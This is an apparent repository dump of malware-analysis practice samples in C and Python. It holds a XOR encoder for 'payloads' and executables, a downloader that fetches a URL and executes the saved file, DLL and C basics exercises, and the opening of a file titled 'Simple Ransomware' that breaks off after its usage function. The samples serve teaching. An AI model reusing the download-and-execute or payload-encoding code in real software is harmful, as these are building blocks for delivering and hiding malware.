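        printf(" [-] Error! Seeking in file \'%s\'.\n", filename); fclose(fptr); exit(2);
    }

    long position = ftell(fptr);
    fclose(fptr);

    // ftell() reports failure as -1; previously that value was converted to
    // an enormous unsigned size and handed to malloc().
    if (position < 0) {
        printf(" [-] Error! Cannot determine size of file \'%s\'.\n", filename); exit(2);
    }
    return (unsigned long long)position;
}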
40 |
/* Fill buffer with exactly filesize bytes read from filename. An unopenable
 * file exits with 2, a short read exits with 3; the caller sizes buffer. */
void readFileBinary(char *buffer, char *filename, unsigned long long filesize)
{
    FILE *in = fopen(filename, "rb");
    if (in == NULL) {
        printf(" [-] Error! Opening file \'%s\' for reading.\n", filename); exit(2);
    }

    unsigned long long got = fread(buffer, 1, filesize, in);
    if (got != filesize) {
        printf(" [-] Error! Reading file\n"); exit(3);
    }

    fclose(in);
}
57 |
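/* Write filesize bytes from buffer to filename, replacing the file. An
 * unopenable file exits with 2; a short write or a failing close exits with 4. */
void writeFileBinary(char *buffer, char *filename, unsigned long long filesize)
{
    FILE *fptr = fopen(filename, "wb");
    if (fptr == NULL) {
        printf(" [-] Error! Opening file \'%s\' for writing.\n", filename); exit(2);
    }

    unsigned long long numberOfBytes = fwrite(buffer, 1, filesize, fptr);
    if (numberOfBytes != filesize) {
        printf(" [-] Error! Writing file\n"); fclose(fptr); exit(4);
    }

    // fwrite() only fills stdio's buffer; the data reaches the file when it
    // is flushed, so a failing fclose() is a write failure too and was
    // previously ignored.
    if (fclose(fptr) != 0) {
        printf(" [-] Error! Writing file\n"); exit(4);
    }
}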
74 |
/* XOR each of the first filesize bytes of buffer with xorKey in place.
 * buffer holds char, so only the low byte of xorKey has any effect. */
void bufferEncoding(char *buffer, int xorKey, unsigned long long filesize)
{
    unsigned long long idx = 0;
    while (idx < filesize) {
        buffer[idx] = (char)(buffer[idx] ^ xorKey);
        idx++;
    }
}
81 |
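/* Copy the NUL-terminated string src into dst (capacity cap bytes), or
 * report an error and exit with 5 when it does not fit. The previous
 * strcpy() calls had no bound and overflowed the 50-byte stack buffers on
 * long command-line arguments. */
static void copyArg(char *dst, size_t cap, const char *src, const char *what)
{
    size_t len = strlen(src);
    if (len >= cap) {
        printf(" [-] Error! %s is too long (max %lu characters).\n", what, (unsigned long)(cap - 1)); exit(5);
    }
    memcpy(dst, src, len + 1);
}

/* Usage: <prog> <input file> <xor key> <output file>. Reads the input file
 * whole, XORs every byte with the key and writes the result to the output
 * file. Exit codes: 5 usage/argument error, 2 file open error, 3 read or
 * allocation error, 4 write error. */
int main(int argc, char const *argv[])
{
    char progName[50];
    char fileIn[50], fileOut[50];
    int xorKey = 0;
    char *buffer = NULL;
    unsigned long long sizeOfFile = 0;

    // Get program name: the text after the last backslash in argv[0].
    // argv[0] can be NULL when argc == 0, hence the fallback to "".
    const char *self = (argc > 0 && argv[0] != NULL) ? argv[0] : "";
    const char *lastToken = strrchr(self, '\\');
    // Truncation is harmless here: the name only appears in the usage line.
    snprintf(progName, sizeof progName, "%s", lastToken != NULL ? lastToken + 1 : self);

    // Check arguments
    if (argc != 4) {
        printf_usage(progName); exit(5);
    }

    // Parsing arguments (bounded copies, see copyArg)
    copyArg(fileIn, sizeof fileIn, argv[1], "Input file name");
    // Besides the digit check, cap the key at 9 digits: that always fits a
    // 32-bit int, so atoi() cannot overflow (undefined behaviour otherwise).
    if (isValidXorKey(argv[2]) && strlen(argv[2]) <= 9) {
        xorKey = atoi(argv[2]);
    } else {
        printf(" [-] Error! Invalid key. The encrypt key must be numberic!\n"); exit(5);
    }
    copyArg(fileOut, sizeof fileOut, argv[3], "Output file name");

    // Obtain file size
    sizeOfFile = getSizeOfFile(fileIn);

    // Allocate memory to contain the whole file. The size must fit size_t on
    // this build, and at least one byte is requested so that an empty input
    // does not hit malloc(0), which may legitimately return NULL and was
    // then reported as an allocation failure.
    if ((size_t)sizeOfFile != sizeOfFile) {
        printf(" [-] Error! File too large for this build.\n"); exit(3);
    }
    buffer = (char *)malloc(sizeOfFile > 0 ? (size_t)sizeOfFile : 1);
    if (buffer == NULL) {
        printf(" [-] Error! Memory not allocated.\n"); exit(3);
    }

    // Reading file to buffer
    readFileBinary(buffer, fileIn, sizeOfFile);

    // Encoding payload
    bufferEncoding(buffer, xorKey, sizeOfFile);

    // Write buffer to new file
    writeFileBinary(buffer, fileOut, sizeOfFile);

    // Terminate
    free(buffer);

    return 0;
}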
--------------------------------------------------------------------------------
/lma-poc/mingw/ex11_simple_downloader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "urlmon.lib")
6 |
7 | /*
8 | ** Ref 1: https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/ms775123(v=vs.85)
9 | ** Ref 2: https://stackoverflow.com/a/5185008
10 | */
11 |
int main()
{
    // TCHAR/TEXT() are paired with the ...A (ANSI) functions below, so this
    // only compiles in a non-UNICODE build where TCHAR is char.
    TCHAR url[] = TEXT("https://github.com/fluidicon.png");
    TCHAR filePath[MAX_PATH];

    // Current working directory (return value unchecked: on failure filePath
    // stays uninitialised and the path built below is garbage).
    GetCurrentDirectoryA(MAX_PATH, filePath);

    // Format path to save downloaded file.
    // NOTE(review): filePath is both the destination and the "%s" argument;
    // overlapping buffers make the result undefined - format from a
    // separate buffer instead.
    wsprintfA(filePath, TEXT("%s\\fluidicon.png"), filePath);

    // Download file from url. The Sleep() calls only pace the console output
    // and have no functional role.
    HRESULT hRes = URLDownloadToFileA(NULL, url, filePath, 0, NULL);
    Sleep(400);

    // Print result. On success the saved file is handed to the shell with the
    // "open" verb, i.e. the application associated with its extension runs it
    // (here a PNG, so an image viewer). Download immediately followed by
    // execution of the result is the behaviour a defender would flag.
    if (hRes == S_OK) {
        printf(" [+] File download successfully.\n");
        Sleep(400);
        printf(" [+] Saved to: %s\n", filePath);
        Sleep(400);
        printf(" [+] Executing file dropped..!");
        Sleep(400);
        ShellExecuteA(NULL, "open", filePath, NULL, NULL, 1);
    } else if (hRes == E_OUTOFMEMORY) {
        // the two messages below follow the URLDownloadToFile documentation
        printf(" [-] The buffer length is invalid.\n");
    } else if (hRes == INET_E_DOWNLOAD_FAILURE) {
        printf(" [-] The specified resource or callback interface was invalid.\n");
    } else {
        printf(" [-] Unknown Error!\n");
    }

    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/mingw/ex12_simple_dropper.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
int main()
{
    /* Intentionally empty: the dropper example is not implemented in this
       file (the msvc tree carries a separate Ex14_Simple_Dropper project). */
    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/mingw/simple_dll/main.cpp:
--------------------------------------------------------------------------------
1 | #include "main.h"
2 | #include
3 |
void DLL_EXPORT FooFun0()
{
    // Exported, no parameters: shows an informational box naming the function.
    const char *body = "No Args!";
    MessageBoxA(0, body, "FooFun0", MB_OK | MB_ICONINFORMATION);
}
8 |
void DLL_EXPORT FooFun1(char *first)
{
    // Exported with one parameter, which is accepted but never read.
    const char *body = "One Args!";
    MessageBoxA(0, body, "FooFun1", MB_OK | MB_ICONINFORMATION);
}
13 |
void DLL_EXPORT FooFun2(int first, int last)
{
    // Both parameters are ignored; the box always shows the fixed 25 + 75
    // sum (the message text says "Three Args!" although two are taken).
    const int lhs = 25;
    const int rhs = 75;
    const int sum = lhs + rhs;
    char message[100];   // the formatted text is far shorter than 100 bytes
    sprintf(message, "Three Args!\n%d + %d = %d", lhs, rhs, sum);
    MessageBoxA(0, message, "FooFun2", MB_OK | MB_ICONINFORMATION);
}
24 |
// Entry point the loader calls on process and thread attach/detach. The
// message box below runs before the switch, so it appears on every one of
// those notifications, not only when the DLL is first loaded.
// NOTE(review): Microsoft's DllMain guidance advises against calling
// functions such as MessageBoxA while the loader lock is held; it is kept
// here because showing that DllMain ran is the point of this sample.
// hinstDLL and lpvReserved are not used.
extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    int number1, number2, number3;
    number1 = 8;
    number2 = 2;
    number3 = number1 + number2;
    char buff[100];   // the formatted text is far shorter than 100 bytes
    sprintf(buff, "DllMain Function\n%d + %d = %d", number1, number2, number3);

    MessageBoxA(0, buff, "DllMain", MB_OK | MB_ICONINFORMATION);

    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        // attach to process
        // return FALSE to fail DLL load
        break;

    case DLL_PROCESS_DETACH:
        // detach from process
        break;

    case DLL_THREAD_ATTACH:
        // attach to thread
        break;

    case DLL_THREAD_DETACH:
        // detach from thread
        break;
    }
    return TRUE; // successful (only DLL_PROCESS_ATTACH would fail the load on FALSE)
}
57 |
--------------------------------------------------------------------------------
/lma-poc/mingw/simple_dll/main.h:
--------------------------------------------------------------------------------
#ifndef __MAIN_H__
#define __MAIN_H__

#include

/* To use the exported functions of this dll, include this header
 * in your project.
 *
 * DLL_EXPORT expands to dllexport when BUILD_DLL is defined (i.e. when the
 * DLL itself is being compiled) and to dllimport otherwise (when a client
 * links against it). The extern "C" wrapper keeps the exported names
 * unmangled so C and C++ consumers see the same symbols.
 */

#ifdef BUILD_DLL
#define DLL_EXPORT __declspec(dllexport)
#else
#define DLL_EXPORT __declspec(dllimport)
#endif


#ifdef __cplusplus
extern "C"
{
#endif

/* Each function only shows a message box; see main.cpp. */
void DLL_EXPORT FooFun0();
void DLL_EXPORT FooFun1(char *first);
void DLL_EXPORT FooFun2(int first, int last);

#ifdef __cplusplus
}
#endif

#endif // __MAIN_H__
31 |
--------------------------------------------------------------------------------
/lma-poc/mingw/simple_dll/simple_dll.cbp:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/lma-poc/mingw/simple_dll/simple_dll.depend:
--------------------------------------------------------------------------------
1 | # depslib dependency file v1.0
2 | 1602573253 source:c:\users\hai\desktop\sample\lma_code\simple_dll\main.cpp
3 | "main.h"
4 |
5 |
6 | 1602573096 c:\users\hai\desktop\sample\lma_code\simple_dll\main.h
7 |
8 |
9 |
--------------------------------------------------------------------------------
/lma-poc/mingw/simple_dll/simple_dll.layout:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/lma-poc/mingw/xor_file.py:
--------------------------------------------------------------------------------
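# Use: ./xor_file.py file1 xor_key outfile
# Example: ./xor_file.py C:\a.exe 6 C:\result.exe
#
# XORs every byte of the input file with a single-byte key and writes the
# result to outfile. XOR is symmetric, so running the tool again with the
# same key restores the original bytes.

import sys

# Read the whole input file as a mutable byte array; the context manager
# closes the handle (the original left both files open until exit)
with open(sys.argv[1], 'rb') as f_in:
    file_bin = bytearray(f_in.read())
# The key is a decimal integer. bytearray assignment below raises ValueError
# when a XOR result leaves 0..255, i.e. for any key outside 0..255.
xor_key = int(sys.argv[2])
file_enc = sys.argv[3]

# The output has exactly the same length as the input
size = len(file_bin)
payload_encoded = bytearray(size)

# XOR encode byte by byte
for i in range(size):
    payload_encoded[i] = file_bin[i] ^ xor_key

# Write the XORed bytes to the output file
with open(file_enc, 'wb') as f_out:
    f_out.write(payload_encoded)

print("[*] {0} XOR {1}\n[*] Saved to {2}".format(sys.argv[1], xor_key, file_enc))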
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex01_MessageBox/Ex01_MessageBox.c:
--------------------------------------------------------------------------------
1 | #include
2 | #pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")
3 |
4 | /*
5 | * Ref:
6 | * 1. https://stackoverflow.com/a/6882500
7 | * 2. https://stackoverflow.com/a/12413270
8 | */
/*
 * Ex01: show a single information message box. The linker pragma above
 * selects the windows subsystem, so no console window is created;
 * FreeConsole() is the alternative when built as a console program.
 */
int main() {
    const char *text = "Hello, World!";
    const char *caption = "Hi!";
    //FreeConsole(); // For hide console windows.
    MessageBoxA(NULL, text, caption, MB_OK | MB_ICONINFORMATION);
    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex01_MessageBox/Ex01_MessageBox.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex01_MessageBox/Ex01_MessageBox.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex02_PrintString/Ex02_PrintString.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex02_PrintString/Ex02_PrintString.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex02_PrintString/Ex02_Print_String.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
/*
 * Ex02: write two string literals to stdout, the first via printf("%s")
 * and the second via puts(), which appends the trailing newline.
 */
int main() {
    const char *prefix = "Lorem Ipsum ";
    printf("%s", prefix);

    const char *suffix = "is simply dummy text.";
    puts(suffix);

    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex03_LocalVariable/Ex03_LocalVariable.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex03_LocalVariable/Ex03_LocalVariable.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex03_LocalVariable/Ex03_Local_Variable.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
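/*
 * Ex03: three locals of different types (unsigned int, pointer to a string
 * literal, float) printed once each. `%u` is used for the unsigned year;
 * the original used `%d`, which does not match the argument type.
 */
int main()
{
    unsigned int iYear = 2020;
    const char *strCountry = "US";
    float flScore = 8.5f;

    printf(" [+] Next year = %u\n", iYear + 1);
    printf(" [+] Country = %s\n", strCountry);
    printf(" [+] Increment scrore = %.2f\n", flScore + 1);   /* float is promoted to double for %f */

    return 0;
}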
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex04_GlobalVariable/Ex04_GlobalVariable.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex04_GlobalVariable/Ex04_GlobalVariable.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex04_GlobalVariable/Ex04_Global_Variable.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
unsigned int MAX_BUFFER = 255;   // initialized global variable: has storage of its own, read through its address at use sites
#define MAX_SCORE 100            // preprocessor constant: substituted at the use site, no storage at all
6 |
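/*
 * Ex04: prints a global variable, a #define constant, a char, a float and a
 * function-static in one line, to compare how each kind of value is reached.
 * `%u` is used for MAX_BUFFER (declared unsigned int above); the original
 * used `%d`, which does not match the argument type.
 */
int main()
{
    char chr = 'A';
    float score = 95;
    static int level = 69;   /* static local: persists across calls, stored like a global */
    printf(" [+] All in one line: %u %d %c %.2f %d", MAX_BUFFER, MAX_SCORE, chr, score, level);
    return 0;
}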
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex05_Conditions/Ex05_Conditions.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
/*
 * Ex05: a minimal branch for inspecting compare/jump instructions.
 * x starts at 0, so the condition is always true and x becomes 5, after
 * which x is unconditionally overwritten with 2. Neither value is ever
 * read, so an optimizing build is likely to drop the whole sequence;
 * build without optimization to see it in the disassembly.
 */
int main()
{
    int x = 0;
    if (x == 0)     // always taken: x was just set to 0
    {
        x = 5;
    }
    x = 2;          // overwrites the value assigned in the branch; x is never read
    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex05_Conditions/Ex05_Conditions.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex05_Conditions/Ex05_Conditions.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex06_x86_x64_Architecture/Ex06_x86_x64_Architecture.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
/*
 * Ex06: a single printf with eight mixed int/string arguments, for
 * comparing how call arguments are passed on x86 versus x64.
 */
int main()
{
    const char *fmt = "%d %s %d %s %d %s %s %s";
    printf(fmt, 1, "Two", 3, "FOUR", 555, "sIx!", "777", "eiGht-888");
    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex06_x86_x64_Architecture/Ex06_x86_x64_Architecture.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex06_x86_x64_Architecture/Ex06_x86_x64_Architecture.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex07_FileHandle/Ex07_FileHandle.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex07_FileHandle/Ex07_FileHandle.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex08_BufferClean/Ex08_BufferClean.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex08_BufferClean/Ex08_BufferClean.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex08_BufferClean/Ex08_Buffer_Clean.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #pragma warning(disable : 4996)
4 |
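/*
 * Reads one line into buf (at most size-1 characters), strips the trailing
 * newline and discards whatever of the line did not fit, so a long line can
 * never run past the buffer. Replaces gets(), which has no bound and was
 * removed from the language in C11.
 * Returns 1 when a line was read, 0 on EOF or read error (buf is then empty).
 */
static int read_line(char *buf, int size)
{
    int i;
    int c;

    if (fgets(buf, size, stdin) == NULL) {
        buf[0] = '\0';
        return 0;
    }
    for (i = 0; buf[i] != '\0'; i++) {
        if (buf[i] == '\n') {
            buf[i] = '\0';
            return 1;
        }
    }
    /* No newline seen: the line was longer than the buffer, drain the rest. */
    while ((c = getchar()) != '\n' && c != EOF) {}
    return 1;
}

/*
 * Ex08: reads a name, an age and a country from stdin and echoes them.
 * Demonstrates draining stdin after scanf("%d"), which leaves the newline
 * behind and would otherwise make the next line read return empty.
 * Returns 0 on success, 1 when the age is not a number.
 */
int main()
{
    char name[25], country[20];
    int age = 0, c;

    printf("Name = ");
    read_line(name, (int)sizeof(name));

    printf("Age = ");
    if (scanf("%d", &age) != 1) {
        printf("Invalid age\n");
        return 1;
    }

    /* Discard the remainder of the age line, including the newline scanf left. */
    while ((c = getchar()) != '\n' && c != EOF) {}

    printf("Country = ");
    read_line(country, (int)sizeof(country));

    printf("Name: %s, Country: %s, Age: %d\n", name, country, age);

    return 0;
}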
25 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex09_Function_Pointer/Ex09_Function_Pointer.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #pragma warning(disable : 4996)
4 |
/* Returns a + b; used as a function-pointer target in main(). */
int Add(int a, int b) {
    const int sum = a + b;
    return sum;
}
8 |
/* Returns a * b; used as a function-pointer target in main(). */
int Mul(int a, int b) {
    const int product = a * b;
    return product;
}
12 |
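/*
 * Ex09: two function pointers of type ptrFunc are assigned Add and Mul and
 * then called indirectly with two user-supplied integers.
 * The scanf() results are checked, so a non-numeric entry is reported
 * instead of silently computing with the previous value of x or y (the
 * original ignored the return values).
 * Returns 0 on success, 1 on invalid input.
 */
int main()
{
    typedef int(*ptrFunc)(int, int);

    printf("[ + ] Initialize local variable and function pointer!\n");
    ptrFunc ptrAdd = NULL, ptrMul = NULL;
    int x = 0, y = 0;

    printf("[ + ] Assigned Ptr.\n");
    ptrAdd = &Add;
    ptrMul = &Mul;

    printf("[ + ] Please input numer:\n");
    printf("number x = ");
    if (scanf("%d", &x) != 1) {
        printf("[ - ] Invalid number.\n");
        return 1;
    }
    printf("number y = ");
    if (scanf("%d", &y) != 1) {
        printf("[ - ] Invalid number.\n");
        return 1;
    }

    // Indirect calls through the pointers - the point of the example.
    printf("%d + %d = %d\n", x, y, ptrAdd(x, y));
    printf("%d * %d = %d\n", x, y, ptrMul(x, y));

    return 0;
}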
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex09_Function_Pointer/Ex09_Function_Pointer.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex09_Function_Pointer/Ex09_Function_Pointer.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex10_Callback_Function/Ex10_Callback_Function.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #pragma warning(disable : 4996)
4 |
/* Returns a + b; passed to superCalculator() as a callback. */
int Add(int a, int b) {
    const int sum = a + b;
    return sum;
}
8 |
/* Returns a * b; passed to superCalculator() as a callback. */
int Mul(int a, int b) {
    const int product = a * b;
    return product;
}
12 |
13 | typedef int(*Calculator)(int, int);
14 |
/*
 * Applies the supplied two-argument callback to a and b and returns its
 * result; the caller chooses the operation by passing Add or Mul.
 */
int superCalculator(int a, int b, Calculator ptrCalFunc) {
    const int result = (*ptrCalFunc)(a, b);
    return result;
}
18 |
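/*
 * Ex10: reads two integers and evaluates them through superCalculator(),
 * once with Add and once with Mul as the callback.
 * The scanf() results are checked, so a non-numeric entry is reported
 * instead of computing with the previous value of x or y (the original
 * ignored the return values).
 * Returns 0 on success, 1 on invalid input.
 */
int main()
{
    printf("[ + ] Local variable Initialized.\n");
    int x = 0, y = 0;

    printf("[ + ] Please input numer:\n");
    printf("number x = ");
    if (scanf("%d", &x) != 1) {
        printf("[ - ] Invalid number.\n");
        return 1;
    }
    printf("number y = ");
    if (scanf("%d", &y) != 1) {
        printf("[ - ] Invalid number.\n");
        return 1;
    }

    // The callback is chosen at the call site; superCalculator only dispatches.
    printf("%d + %d = %d\n", x, y, superCalculator(x, y, Add));
    printf("%d * %d = %d\n", x, y, superCalculator(x, y, Mul));

    return 0;
}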
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex10_Callback_Function/Ex10_Callback_Function.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex10_Callback_Function/Ex10_Callback_Function.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex11_Simple_Ransomware/Ex11_Simple_Ransomware.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma warning(disable : 4996)
5 |
6 | /*
7 | ** Name : SFET - Simple File Encryption Tool
8 | ** Version : v0.1 - Beta version
9 | ** Crypto Algorithm support: XOR (AES, RSA, Hashing, etc. are coming)
10 | */
11 |
/*
 * Prints the usage line to stdout; `str` is the program name shown in it.
 */
void printf_usage(char *str)
{
    fprintf(stdout, " [+] Usage: %s \n", str);
}
16 |
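/*
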